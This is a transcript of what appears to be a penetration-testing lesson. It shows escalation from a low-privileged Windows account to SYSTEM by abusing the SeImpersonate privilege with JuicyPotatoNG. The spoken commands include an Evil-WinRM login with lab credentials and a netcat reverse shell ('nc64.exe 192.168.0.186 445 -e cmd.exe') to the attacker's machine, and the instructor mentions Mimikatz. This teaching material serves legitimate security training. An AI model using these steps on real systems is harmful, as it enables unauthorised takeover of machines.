All right, welcome. So today we're going to be taking a look at SeImpersonate privilege. So if I go ahead and let's do an evil win RM in, right? So we're going to do an evil win RM. You may notice that my machine IP has changed. That's because I messed up something, so I had to download a new machine. So we'll go ahead and we'll look at student, and then we'll go ahead and we'll throw in that student password, right? Which we can delete that exclamation point actually. Student 123. I put in another exclamation point by accident. So let's go ahead and log in there. All right, so then once we're in, we'll do a who am I /all. And we can see that we do have this SeImpersonate privilege like right here. You also notice that whenever we come into WinRM, that everything seems to work a little bit better. That's just a little hint. Because like I said, I had to redownload a new machine. I have not done the bypass UAC yet, but we have everything's enabled, all this other stuff. Everything seems to work a little better whenever we go through evil WinRM here. So we have this SeImpersonate privilege. So right now I am student, right? So if we want to upgrade our privileges even further than just student and become NT system authority, or if I do a who am I, there we go. Okay, so let's go ahead and let's do that. So within your PDF, I talk about something called Juicy Potato NG. There's a bunch of them. There's God Potato, there's regular Juicy Potato, there's Print Spoofer. There's a bunch of different things that we can do for SeImpersonate privilege. All right, Juicy Potato NG, the only reason that we talk about that one is because I noticed that one seems to work more often than not nowadays. Okay, it doesn't mean it always works, just seems to work more often than not nowadays. So we'll go ahead and we'll do a wget for that file, that zip file, right? And let's go ahead and unzip it. Unzip that juicy potato, like right there. All right, we see that we get this juicy potato ng.exe. If I cd into c temp, which I don't think actually exists anymore, so let me go ahead and make directory c temp. All right, we can see that cd into c temp. There we go. We can see that there's nothing in here like right now. So let's go ahead and let's put juicy potato.exe in here. We'll upload that juicy potato.exe. And then what we also want to do is we also want to upload netcat64, right? So let's go ahead and head back out and we'll find nc64.exe, unless you still have it. We'll say that, we'll say GitHub. All right, there we go, nc.exe. Then we'll go ahead and we'll download that, move it over to our DC folder there, and then upload that also. One thing with uploads on WinRM is that as whatever folder you start up at, that's what folder it's going to pull from whenever it goes to upload something. So I'll show you a little hint, right? So we're actually going to put this in the op folder this time. So we'll go to view raw, we'll download that, and we'll throw that in the op folder. So let's go ahead and cd into opt. Now let me show you a little hint here on how to do this. cd to /opt. Okay, and then we'll move from downloads nc64.exe to right here, right? Now that's now in the op folder. Oh, let me see here, sudo su. Okay, now we can go ahead and we can do that, say that command above, or we could just do a sudo move or whatever else. But there we go, right? Oh, move from /home Kali, because this is trying to go to my root folder now. /home Kali downloads nc64.exe, like right here. But now let's tack LA. We'll see that's in there, right? There's my nc64.exe. Okay, so now what we need to do is we need to come back up to tab. And if I want to upload, let's say something for the app folder, I go upload. I'm going to hit tab still. It's going to go home Kali DC. Now I got to do a period, and we got to go back directories, okay? Back to the beginning, right? And then we got to say /opt /nc64.exe. And I don't know if he's actually going to be able to do it just because I might get permission denied. All right, and that's how you upload if something's in a different folder. You have to go to the folder that's at and then go back. You can't just do an upload /opt because it's going to try to look at here and then go to /opt, and that's not how it works. So we have to go back, then go to /opt. So you need to give it the full file path, right? Let's go ahead and move that nc64.exe to /home Kali DC, right? Just to make my life a little bit easier. We'll exit out of being root. We'll cd back into home. We'll cd back into our DC, right? And then there's our nc64.exe like right there. So if I do a dir, we can see that both juicy potato and nc64.exe are up here, right? So if I do a period /juicy potato, Remember, Windows does not care about case sensitivity for file names or also usernames, only passwords. So I do my juicepotato.exe, tac t star. Okay. This is for CLS IDs, that tac t like right there. You can look up different CLS IDs on the internet. And also if you just look up juice potato and then look up CLS IDs, you'll see a whole bunch of different versions of them, okay? So now we need to say what program do we want to run, which could be tac p, which could be C, Windows System 32, command.exe, right? From here, we now need to tell the program what do we want to run with C Windows System 32 command.exe. So what do we want to run in command prompt, right? What arguments do we want to send it? So we say /c, which means, hey, I want to send it a command, right? That's going to be one of my arguments, is to actually send a command itself. And then from there, we can go ahead and I did that slash the wrong way. I should say /c, okay? And we're going to say c temp nc64.exe. All right, my IP address 192.168.0.186. A port, we'll say 445 because we know we can talk on that port. And then what we need is we need to give it something to run. Like what do we actually want to send back, right? And that's going to be tac e command prompt. Okay, so we actually want to do tac e command.exe. We should have some closing brackets over here. Boom, and then from over here we can do an RL wrap. Listen on port 445, enter. And now if I do a who am I, you can see that I'm now NC authority system. All right, that's all because we had SeImpersonate privilege. All of that, like right there, is happening because of that. So now we can really do whatever we want. We can also hop over into PowerShell if we want to, and whatever else, right? We can also press up because we did that RL wrap, okay? So we can look at different things in here. We say command key /list. We can really look at whatever we want to, throw Mimikatz on here or whatever else. So hopefully y'all learned something, and I'll talk to y'all later.